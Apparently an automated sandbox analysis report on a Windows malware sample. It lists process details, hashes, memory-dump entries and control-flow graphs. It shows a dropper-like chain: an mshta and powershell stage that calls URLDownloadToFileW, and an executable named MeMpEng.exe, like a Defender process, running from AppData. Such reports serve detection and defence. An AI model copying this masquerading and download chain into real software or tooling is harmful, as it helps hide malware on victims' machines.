                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:01:01:45
                                                        Start date:28/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF3D2.tmp" "c:\Users\user\AppData\Local\Temp\4xnxdpzb\CSC1523D407DAC44B3A2AFF355F7A37C79.TMP"
                                                        Imagebase:0x13f530000
                                                        File size:52'744 bytes
                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:01:01:48
                                                        Start date:28/08/2024
                                                        Path:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\MeMpEng.exe"
                                                        Imagebase:0x400000
                                                        File size:598'995 bytes
                                                        MD5 hash:A80E27FBED396BE3D87FE48DA3C4F266
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Reset < >
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000003.405931234.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash:
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000003.405931234.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash:
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000003.405931234.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash:

                                                          Execution Graph

                                                          Execution Coverage:4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:3
                                                          Total number of Limit Nodes:0
                                                          execution_graph 4110 7fe898a7ae1 4111 7fe898a7af1 URLDownloadToFileW 4110->4111 4113 7fe898a7bf3 4111->4113

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.429462591.000007FE898A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE898A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7fe898a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID: DownloadFile
                                                          • String ID:
                                                          • API String ID: 1407266417-0
                                                          • Opcode ID: f02cdb2b0d92530073135e5a013cec96a895bf2cf6136dc4287669b9eda62f2a
                                                          • Instruction ID: 16de935b46eee3426af922a5975c524e7828d5f60d789e8bbbfaed6cf5a56d7c
                                                          • Opcode Fuzzy Hash: f02cdb2b0d92530073135e5a013cec96a895bf2cf6136dc4287669b9eda62f2a
                                                          • Instruction Fuzzy Hash: 6731A07191CA1C8FDB58EF5CD885BA9B7E1FBA9321F00822ED04DD3651CB74B8068B81

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.429533159.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7fe89970000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: V
                                                          • API String ID: 0-1342839628
                                                          • Opcode ID: 571415ece0dbdf2d96affe875a31a01f75e6f5f142503f5ef6c8c4e04081b1b3
                                                          • Instruction ID: 3b07cd80b8b8e0fdebed2f4b1481f0923c74eed532a48602ef29403ddc582e63
                                                          • Opcode Fuzzy Hash: 571415ece0dbdf2d96affe875a31a01f75e6f5f142503f5ef6c8c4e04081b1b3
                                                          • Instruction Fuzzy Hash: E2D1E63090E7C91FE7579B2898146B57FA4EF47260F0901EBD48DCB1B3D614AD1AC3A2

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.429462591.000007FE898A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE898A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7fe898a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID: DownloadFile
                                                          • String ID:
                                                          • API String ID: 1407266417-0
                                                          • Opcode ID: 950086ebacd65f8b889c84567660f827c19f7880ed13d9ea0b2e4011bf604ea2
                                                          • Instruction ID: 38f4628420c15c4dcaf628161ca158435482abcd5f1a08e0a6657327c87d8c1b
                                                          • Opcode Fuzzy Hash: 950086ebacd65f8b889c84567660f827c19f7880ed13d9ea0b2e4011bf604ea2
                                                          • Instruction Fuzzy Hash: 7A41167090CB899FDB16DB5898447EABBF4FB56321F04426FD089D7552CB686806C782

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.429533159.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7fe89970000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8h~
                                                          • API String ID: 0-259663259
                                                          • Opcode ID: 780e5fb0050874caee77091977aa9c80f0cd6da70d94c60d725e0af17a8be2b8
                                                          • Instruction ID: 62a848490557740b42b234934235fa2ce6ebbc17c2b04dff47d0c8243c1f6008
                                                          • Opcode Fuzzy Hash: 780e5fb0050874caee77091977aa9c80f0cd6da70d94c60d725e0af17a8be2b8
                                                          • Instruction Fuzzy Hash: B041F71174DBC90FE34B973C1864264BFE2EF4B254B1901EBC48ECB1A3D9099D56C3A1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 99 7fe89978549-7fe899785f9 100 7fe89978add-7fe89978b96 99->100 101 7fe899785ff-7fe89978609 99->101 102 7fe8997860b-7fe89978618 101->102 103 7fe89978622-7fe89978629 101->103 102->103 105 7fe8997861a-7fe89978620 102->105 106 7fe8997862b-7fe8997863e 103->106 107 7fe89978640 103->107 105->103 108 7fe89978642-7fe89978644 106->108 107->108 109 7fe89978a58-7fe89978a62 108->109 110 7fe8997864a-7fe89978656 108->110 114 7fe89978a64-7fe89978a74 109->114 115 7fe89978a75-7fe89978a85 109->115 110->100 113 7fe8997865c-7fe89978666 110->113 116 7fe89978668-7fe89978675 113->116 117 7fe89978682-7fe89978692 113->117 119 7fe89978a87-7fe89978a8b 115->119 120 7fe89978a92-7fe89978adc 115->120 116->117 121 7fe89978677-7fe89978680 116->121 117->109 126 7fe89978698-7fe899786cc 117->126 119->120 121->117 126->109 131 7fe899786d2-7fe899786de 126->131 131->100 132 7fe899786e4-7fe899786ee 131->132 133 7fe89978707-7fe8997870c 132->133 134 7fe899786f0-7fe899786fd 132->134 133->109 136 7fe89978712-7fe89978717 133->136 134->133 135 7fe899786ff-7fe89978705 134->135 135->133 136->109 137 7fe8997871d-7fe89978722 136->137 137->109 139 7fe89978728-7fe89978737 137->139 140 7fe89978747 139->140 141 7fe89978739-7fe89978743 139->141 144 7fe8997874c-7fe89978759 140->144 142 7fe89978763-7fe899787ee 141->142 143 7fe89978745 141->143 151 7fe899787f0-7fe899787fb 142->151 152 7fe89978802-7fe89978824 142->152 143->144 144->142 146 7fe8997875b-7fe89978761 144->146 146->142 151->152 153 7fe89978826-7fe89978830 152->153 154 7fe89978834 152->154 155 7fe89978850-7fe899788de 153->155 156 7fe89978832 153->156 157 7fe89978839-7fe89978846 154->157 164 7fe899788e0-7fe899788eb 155->164 165 7fe899788f2-7fe89978910 155->165 156->157 157->155 158 7fe89978848-7fe8997884e 157->158 158->155 164->165 166 7fe89978920 165->166 167 7fe89978912-7fe8997891c 165->167 170 7fe89978925-7fe89978933 166->170 168 7fe8997893d-7fe899789cd 167->168 169 7fe8997891e 167->169 177 7fe899789cf-7fe899789da 168->177 178 7fe899789e1-7fe89978a3a 168->178 169->170 170->168 171 7fe89978935-7fe8997893b 170->171 171->168 177->178 181 7fe89978a42-7fe89978a57 178->181
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.429533159.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7fe89970000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fde261c9b18efde342ba3ea6f06f6d49f6dcb7a8fb22f9b77193bba9071c0d78
                                                          • Instruction ID: 11b70ccf39d9b150d0124f50e8ab3ba206988f94815f0745076e518dc3bafdfa
                                                          • Opcode Fuzzy Hash: fde261c9b18efde342ba3ea6f06f6d49f6dcb7a8fb22f9b77193bba9071c0d78
                                                          • Instruction Fuzzy Hash: 4322163090CBC95FD789DB2C94546797BE2FF9A344F2400AED44EC72A3DA24AC56C741

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 182 7fe8997416a-7fe8997416f 183 7fe899741b1-7fe899741f4 182->183 184 7fe89974171 182->184 186 7fe89974457-7fe89974516 183->186 187 7fe899741fa-7fe89974204 183->187 184->183 188 7fe89974206-7fe89974213 187->188 189 7fe8997421d-7fe89974222 187->189 188->189 192 7fe89974215-7fe8997421b 188->192 190 7fe89974228-7fe8997422b 189->190 191 7fe899743fb-7fe89974405 189->191 194 7fe8997422d-7fe89974240 190->194 195 7fe89974242 190->195 196 7fe89974407-7fe89974413 191->196 197 7fe89974414-7fe89974424 191->197 192->189 198 7fe89974244-7fe89974246 194->198 195->198 199 7fe89974426-7fe8997442a 197->199 200 7fe89974431-7fe89974454 197->200 198->191 203 7fe8997424c-7fe89974280 198->203 199->200 200->186 210 7fe89974297 203->210 211 7fe89974282-7fe89974295 203->211 212 7fe89974299-7fe8997429b 210->212 211->212 212->191 214 7fe899742a1-7fe899742a9 212->214 214->186 215 7fe899742af-7fe899742b9 214->215 216 7fe899742bb-7fe899742c8 215->216 217 7fe899742d5-7fe899742e5 215->217 216->217 218 7fe899742ca-7fe899742d3 216->218 217->191 221 7fe899742eb-7fe8997431c 217->221 218->217 221->191 224 7fe89974322-7fe8997434e 221->224 226 7fe89974350-7fe89974372 224->226 227 7fe89974374 224->227 228 7fe89974376-7fe89974378 226->228 227->228 228->191 229 7fe8997437e-7fe89974386 228->229 231 7fe89974396 229->231 232 7fe89974388-7fe89974392 229->232 236 7fe8997439b-7fe899743a8 231->236 234 7fe899743b2-7fe899743d1 232->234 235 7fe89974394 232->235 238 7fe899743db-7fe899743e1 234->238 235->236 236->234 237 7fe899743aa-7fe899743b0 236->237 237->234 239 7fe899743e8-7fe899743fa 238->239
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.429533159.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7fe89970000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8b5982575e5a743ff579539c01eb58e1c666e147c88114a3b97f47076da75483
                                                          • Instruction ID: 37b3922c0923e012964d816fb00b3fa4f67293c974966ccf3ee0de5d6afa0949
                                                          • Opcode Fuzzy Hash: 8b5982575e5a743ff579539c01eb58e1c666e147c88114a3b97f47076da75483
                                                          • Instruction Fuzzy Hash: 0EC1293091DACA4FEB4AEB6C94147B97FD2EF4A348F1401AAD44EC71B3DA14AC61C361

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 241 7fe89974190-7fe899741aa 242 7fe899741c6-7fe899741f4 241->242 243 7fe899741ac-7fe899741c5 241->243 244 7fe89974457-7fe89974516 242->244 245 7fe899741fa-7fe89974204 242->245 243->242 246 7fe89974206-7fe89974213 245->246 247 7fe8997421d-7fe89974222 245->247 246->247 250 7fe89974215-7fe8997421b 246->250 248 7fe89974228-7fe8997422b 247->248 249 7fe899743fb-7fe89974405 247->249 252 7fe8997422d-7fe89974240 248->252 253 7fe89974242 248->253 254 7fe89974407-7fe89974413 249->254 255 7fe89974414-7fe89974424 249->255 250->247 256 7fe89974244-7fe89974246 252->256 253->256 257 7fe89974426-7fe8997442a 255->257 258 7fe89974431-7fe89974454 255->258 256->249 261 7fe8997424c-7fe89974280 256->261 257->258 258->244 268 7fe89974297 261->268 269 7fe89974282-7fe89974295 261->269 270 7fe89974299-7fe8997429b 268->270 269->270 270->249 272 7fe899742a1-7fe899742a9 270->272 272->244 273 7fe899742af-7fe899742b9 272->273 274 7fe899742bb-7fe899742c8 273->274 275 7fe899742d5-7fe899742e5 273->275 274->275 276 7fe899742ca-7fe899742d3 274->276 275->249 279 7fe899742eb-7fe8997431c 275->279 276->275 279->249 282 7fe89974322-7fe8997434e 279->282 284 7fe89974350-7fe89974372 282->284 285 7fe89974374 282->285 286 7fe89974376-7fe89974378 284->286 285->286 286->249 287 7fe8997437e-7fe89974386 286->287 289 7fe89974396 287->289 290 7fe89974388-7fe89974392 287->290 294 7fe8997439b-7fe899743a8 289->294 292 7fe899743b2-7fe899743e1 290->292 293 7fe89974394 290->293 297 7fe899743e8-7fe899743fa 292->297 293->294 294->292 295 7fe899743aa-7fe899743b0 294->295 295->292
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.429533159.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7fe89970000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f8ab36fbb478e36c0a82e4bcc1343511c1d8b779f4de7ef38d452eead6f48fc
                                                          • Instruction ID: 866e33884d4ab33eb2bb6a54c8b1c934211002b67876a4b162576a49b298b202
                                                          • Opcode Fuzzy Hash: 1f8ab36fbb478e36c0a82e4bcc1343511c1d8b779f4de7ef38d452eead6f48fc
                                                          • Instruction Fuzzy Hash: F381E52091DBCA0FE74AAB6845507797FD2EF46744F1910EAD48ECB1F3CA18AC66C361

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 324 7fe899776ad-7fe89977700 326 7fe8997769a-7fe899776a8 324->326 327 7fe89977703-7fe89977737 324->327 328 7fe8997784a-7fe899778f5 327->328 329 7fe8997773d-7fe89977747 327->329 362 7fe899778f7 328->362 363 7fe899778f8-7fe89977901 328->363 330 7fe89977749-7fe89977756 329->330 331 7fe89977763-7fe89977770 329->331 330->331 332 7fe89977758-7fe89977761 330->332 337 7fe899777eb-7fe899777f5 331->337 338 7fe89977772-7fe89977775 331->338 332->331 340 7fe899777f7-7fe89977803 337->340 341 7fe89977804-7fe89977814 337->341 338->337 339 7fe89977777-7fe8997777f 338->339 339->328 343 7fe89977785-7fe8997778f 339->343 344 7fe89977816-7fe8997781a 341->344 345 7fe89977821-7fe89977847 341->345 346 7fe899777a8-7fe899777ac 343->346 347 7fe89977791-7fe8997779e 343->347 344->345 345->328 346->337 350 7fe899777ae-7fe899777b1 346->350 347->346 349 7fe899777a0-7fe899777a6 347->349 349->346 350->337 352 7fe899777b3-7fe899777c4 350->352 356 7fe899777c6-7fe899777d3 352->356 357 7fe899777dd-7fe899777ea 352->357 356->357 359 7fe899777d5-7fe899777db 356->359 359->357 362->363 364 7fe89977902-7fe89977909 363->364 365 7fe8997790b 364->365 366 7fe8997790c-7fe89977969 364->366 365->366 366->364 369 7fe8997796b-7fe89977994 366->369 370 7fe8997799a-7fe899779a4 369->370 371 7fe89977acd-7fe89977b79 369->371 372 7fe899779a6-7fe899779b3 370->372 373 7fe899779bd-7fe899779c2 370->373 405 7fe89977b7b 371->405 406 7fe89977b7c-7fe89977b87 371->406 372->373 374 7fe899779b5-7fe899779bb 372->374 375 7fe899779c8-7fe899779cb 373->375 376 7fe89977a6e-7fe89977a78 373->376 374->373 380 7fe899779cd-7fe899779e0 375->380 381 7fe899779e2 375->381 378 7fe89977a87-7fe89977a97 376->378 379 7fe89977a7a-7fe89977a86 376->379 384 7fe89977a99-7fe89977a9d 378->384 385 7fe89977aa4-7fe89977aca 378->385 382 7fe899779e4-7fe899779e6 380->382 381->382 382->376 387 7fe899779ec-7fe899779ef 382->387 384->385 385->371 388 7fe89977a16 387->388 389 7fe899779f1-7fe89977a14 387->389 392 7fe89977a18-7fe89977a1a 388->392 389->392 392->376 395 7fe89977a1c-7fe89977a47 392->395 401 7fe89977a49-7fe89977a56 395->401 402 7fe89977a60-7fe89977a6d 395->402 401->402 404 7fe89977a58-7fe89977a5e 401->404 404->402 405->406 408 7fe89977b8a-7fe89977b8d 406->408 409 7fe89977b8e-7fe89977b8f 408->409 410 7fe89977b90-7fe89977bd0 408->410 409->410 414 7fe89977c4d-7fe89977c51 410->414 415 7fe89977bd2-7fe89977bda 410->415 416 7fe89977bf6-7fe89977c4c 415->416 417 7fe89977bdc-7fe89977bf1 415->417 416->414 417->408 418 7fe89977bf3-7fe89977bf5 417->418 418->416
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.429533159.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7fe89970000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: r6|$r6|
                                                          • API String ID: 0-3230945223
                                                          • Opcode ID: 59c1211654f5a15da102fab3398b17c39128eb3d43409eb2153ed69930e4ee67
                                                          • Instruction ID: 74153c94054de2dcb528cc1f97a3aa72e690fba08169bfb7f5bf2ee2e43074cb
                                                          • Opcode Fuzzy Hash: 59c1211654f5a15da102fab3398b17c39128eb3d43409eb2153ed69930e4ee67
                                                          • Instruction Fuzzy Hash: 54121120A0EBC91FE756AB3858246B97FE1EF47254F1901EBD48DC71B3D918AC19C392
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.429533159.000007FE89970000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7fe89970000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 671ed4b59a3357d4970c02320a44dba23feb19653a6c65979c2a47c8381d96c0
                                                          • Instruction ID: 79f7407dfef53e7d61ce269c741204eef15e6f4b36e3d2fe0fb15c2491f10e2c
                                                          • Opcode Fuzzy Hash: 671ed4b59a3357d4970c02320a44dba23feb19653a6c65979c2a47c8381d96c0
                                                          • Instruction Fuzzy Hash: 0EA1592080EBC91FD7479B38A8152A63FE5EF5B254F0901EBD48DCB1B3D6189D1AC362

                                                          Execution Graph

                                                          Execution Coverage:22.5%
                                                          Dynamic/Decrypted Code Coverage:13.6%
                                                          Signature Coverage:16%
                                                          Total number of Nodes:1593
                                                          Total number of Limit Nodes:44
                                                          execution_graph 4057 401bc0 4058 401c11 4057->4058 4059 401bcd 4057->4059 4060 401c16 4058->4060 4061 401c3b GlobalAlloc 4058->4061 4062 4023af 4059->4062 4067 401be4 4059->4067 4070 401c56 4060->4070 4096 406554 lstrcpynW 4060->4096 4076 406591 4061->4076 4064 406591 22 API calls 4062->4064 4066 4023bc 4064->4066 4066->4070 4097 405bb4 4066->4097 4094 406554 lstrcpynW 4067->4094 4068 401c28 GlobalFree 4068->4070 4072 401bf3 4095 406554 lstrcpynW 4072->4095 4074 401c02 4101 406554 lstrcpynW 4074->4101 4091 40659c 4076->4091 4077 4067e3 4078 4067fc 4077->4078 4124 406554 lstrcpynW 4077->4124 4078->4070 4080 4067b4 lstrlenW 4080->4091 4083 406591 15 API calls 4083->4080 4084 4066ad GetSystemDirectoryW 4084->4091 4086 4066c3 GetWindowsDirectoryW 4086->4091 4087 406591 15 API calls 4087->4091 4088 406755 lstrcatW 4088->4091 4090 4066f9 SHGetFolderPathW 4090->4091 4091->4077 4091->4080 4091->4083 4091->4084 4091->4086 4091->4087 4091->4088 4091->4090 4093 406725 SHGetPathFromIDListW CoTaskMemFree 4091->4093 4102 406422 4091->4102 4107 406948 GetModuleHandleA 4091->4107 4113 406802 4091->4113 4122 40649b wsprintfW 4091->4122 4123 406554 lstrcpynW 4091->4123 4093->4091 4094->4072 4095->4074 4096->4068 4098 405bc9 4097->4098 4099 405c15 4098->4099 4100 405bdd MessageBoxIndirectW 4098->4100 4099->4070 4100->4099 4101->4070 4125 4063c1 4102->4125 4105 406486 4105->4091 4106 406456 RegQueryValueExW RegCloseKey 4106->4105 4108 406964 4107->4108 4109 40696e GetProcAddress 4107->4109 4129 4068d8 GetSystemDirectoryW 4108->4129 4112 40697d 4109->4112 4111 40696a 4111->4109 4111->4112 4112->4091 4119 40680f 4113->4119 4114 406885 4115 40688a CharPrevW 4114->4115 4117 4068ab 4114->4117 4115->4114 4116 406878 CharNextW 4116->4114 4116->4119 4117->4091 4119->4114 4119->4116 4120 406864 CharNextW 4119->4120 4121 406873 CharNextW 4119->4121 4132 405e50 4119->4132 4120->4119 4121->4116 4122->4091 4123->4091 4124->4078 4126 4063d0 4125->4126 4127 4063d9 RegOpenKeyExW 4126->4127 4128 4063d4 4126->4128 4127->4128 4128->4105 4128->4106 4130 4068fa wsprintfW LoadLibraryExW 4129->4130 4130->4111 4133 405e56 4132->4133 4134 405e6c 4133->4134 4135 405e5d CharNextW 4133->4135 4134->4119 4135->4133 5168 404f40 GetDlgItem GetDlgItem 5169 404f92 7 API calls 5168->5169 5175 4051b7 5168->5175 5170 405039 DeleteObject 5169->5170 5171 40502c SendMessageW 5169->5171 5172 405042 5170->5172 5171->5170 5174 405079 5172->5174 5176 406591 22 API calls 5172->5176 5173 405299 5178 405345 5173->5178 5187 4052f2 SendMessageW 5173->5187 5210 4051aa 5173->5210 5177 4044d3 23 API calls 5174->5177 5175->5173 5211 405226 5175->5211 5222 404e8e SendMessageW 5175->5222 5181 40505b SendMessageW SendMessageW 5176->5181 5182 40508d 5177->5182 5179 405357 5178->5179 5180 40534f SendMessageW 5178->5180 5189 405370 5179->5189 5190 405369 ImageList_Destroy 5179->5190 5198 405380 5179->5198 5180->5179 5181->5172 5186 4044d3 23 API calls 5182->5186 5183 40528b SendMessageW 5183->5173 5184 40453a 8 API calls 5188 405546 5184->5188 5201 40509e 5186->5201 5192 405307 SendMessageW 5187->5192 5187->5210 5193 405379 GlobalFree 5189->5193 5189->5198 5190->5189 5191 4054fa 5196 40550c ShowWindow GetDlgItem ShowWindow 5191->5196 5191->5210 5195 40531a 5192->5195 5193->5198 5194 405179 GetWindowLongW SetWindowLongW 5197 405192 5194->5197 5203 40532b SendMessageW 5195->5203 5196->5210 5199 405197 ShowWindow 5197->5199 5200 4051af 5197->5200 5198->5191 5213 4053bb 5198->5213 5227 404f0e 5198->5227 5220 404508 SendMessageW 5199->5220 5221 404508 SendMessageW 5200->5221 5201->5194 5202 4050f1 SendMessageW 5201->5202 5204 405174 5201->5204 5207 405143 SendMessageW 5201->5207 5208 40512f SendMessageW 5201->5208 5202->5201 5203->5178 5204->5194 5204->5197 5207->5201 5208->5201 5210->5184 5211->5173 5211->5183 5212 4054c5 5214 4054d0 InvalidateRect 5212->5214 5216 4054dc 5212->5216 5215 4053e9 SendMessageW 5213->5215 5217 4053ff 5213->5217 5214->5216 5215->5217 5216->5191 5236 404e49 5216->5236 5217->5212 5219 405473 SendMessageW SendMessageW 5217->5219 5219->5217 5220->5210 5221->5175 5223 404eb1 GetMessagePos ScreenToClient SendMessageW 5222->5223 5224 404eed SendMessageW 5222->5224 5225 404ee5 5223->5225 5226 404eea 5223->5226 5224->5225 5225->5211 5226->5224 5239 406554 lstrcpynW 5227->5239 5229 404f21 5240 40649b wsprintfW 5229->5240 5231 404f2b 5232 40140b 2 API calls 5231->5232 5233 404f34 5232->5233 5241 406554 lstrcpynW 5233->5241 5235 404f3b 5235->5213 5242 404d80 5236->5242 5238 404e5e 5238->5191 5239->5229 5240->5231 5241->5235 5243 404d99 5242->5243 5244 406591 22 API calls 5243->5244 5245 404dfd 5244->5245 5246 406591 22 API calls 5245->5246 5247 404e08 5246->5247 5248 406591 22 API calls 5247->5248 5249 404e1e lstrlenW wsprintfW SetDlgItemTextW 5248->5249 5249->5238 5250 402641 5251 402dcb 22 API calls 5250->5251 5252 402648 5251->5252 5255 406044 GetFileAttributesW CreateFileW 5252->5255 5254 402654 5255->5254 4152 4025c3 4163 402e0b 4152->4163 4156 4025d6 4157 402953 4156->4157 4158 4025f2 RegEnumKeyW 4156->4158 4159 4025fe RegEnumValueW 4156->4159 4160 40261a RegCloseKey 4158->4160 4159->4160 4161 402613 4159->4161 4160->4157 4161->4160 4164 402dcb 22 API calls 4163->4164 4165 402e22 4164->4165 4166 4063c1 RegOpenKeyExW 4165->4166 4167 4025cd 4166->4167 4168 402da9 4167->4168 4169 406591 22 API calls 4168->4169 4170 402dbe 4169->4170 4170->4156 5256 404643 lstrlenW 5257 404662 5256->5257 5258 404664 WideCharToMultiByte 5256->5258 5257->5258 5259 4049c4 5260 4049f0 5259->5260 5261 404a01 5259->5261 5320 405b98 GetDlgItemTextW 5260->5320 5263 404a0d GetDlgItem 5261->5263 5266 404a6c 5261->5266 5265 404a21 5263->5265 5264 4049fb 5267 406802 5 API calls 5264->5267 5268 404a35 SetWindowTextW 5265->5268 5271 405ece 4 API calls 5265->5271 5273 406591 22 API calls 5266->5273 5281 404b50 5266->5281 5318 404cff 5266->5318 5267->5261 5272 4044d3 23 API calls 5268->5272 5270 40453a 8 API calls 5275 404d13 5270->5275 5279 404a2b 5271->5279 5276 404a51 5272->5276 5277 404ae0 SHBrowseForFolderW 5273->5277 5274 404b80 5278 405f2b 18 API calls 5274->5278 5280 4044d3 23 API calls 5276->5280 5277->5281 5282 404af8 CoTaskMemFree 5277->5282 5283 404b86 5278->5283 5279->5268 5286 405e23 3 API calls 5279->5286 5284 404a5f 5280->5284 5281->5318 5322 405b98 GetDlgItemTextW 5281->5322 5285 405e23 3 API calls 5282->5285 5323 406554 lstrcpynW 5283->5323 5321 404508 SendMessageW 5284->5321 5288 404b05 5285->5288 5286->5268 5291 404b3c SetDlgItemTextW 5288->5291 5295 406591 22 API calls 5288->5295 5290 404a65 5293 406948 5 API calls 5290->5293 5291->5281 5292 404b9d 5294 406948 5 API calls 5292->5294 5293->5266 5302 404ba4 5294->5302 5296 404b24 lstrcmpiW 5295->5296 5296->5291 5299 404b35 lstrcatW 5296->5299 5297 404be5 5324 406554 lstrcpynW 5297->5324 5299->5291 5300 404bec 5301 405ece 4 API calls 5300->5301 5303 404bf2 GetDiskFreeSpaceW 5301->5303 5302->5297 5306 405e6f 2 API calls 5302->5306 5308 404c3d 5302->5308 5305 404c16 MulDiv 5303->5305 5303->5308 5305->5308 5306->5302 5307 404cae 5310 404cd1 5307->5310 5312 40140b 2 API calls 5307->5312 5308->5307 5309 404e49 25 API calls 5308->5309 5311 404c9b 5309->5311 5325 4044f5 KiUserCallbackDispatcher 5310->5325 5313 404cb0 SetDlgItemTextW 5311->5313 5314 404ca0 5311->5314 5312->5310 5313->5307 5317 404d80 25 API calls 5314->5317 5316 404ced 5316->5318 5326 40491d 5316->5326 5317->5307 5318->5270 5320->5264 5321->5290 5322->5274 5323->5292 5324->5300 5325->5316 5327 404930 SendMessageW 5326->5327 5328 40492b 5326->5328 5327->5318 5328->5327 4179 4015c8 4180 402dcb 22 API calls 4179->4180 4181 4015cf SetFileAttributesW 4180->4181 4182 4015e1 4181->4182 4183 401fc9 4184 402dcb 22 API calls 4183->4184 4185 401fcf 4184->4185 4198 4055d9 4185->4198 4190 402002 CloseHandle 4194 402953 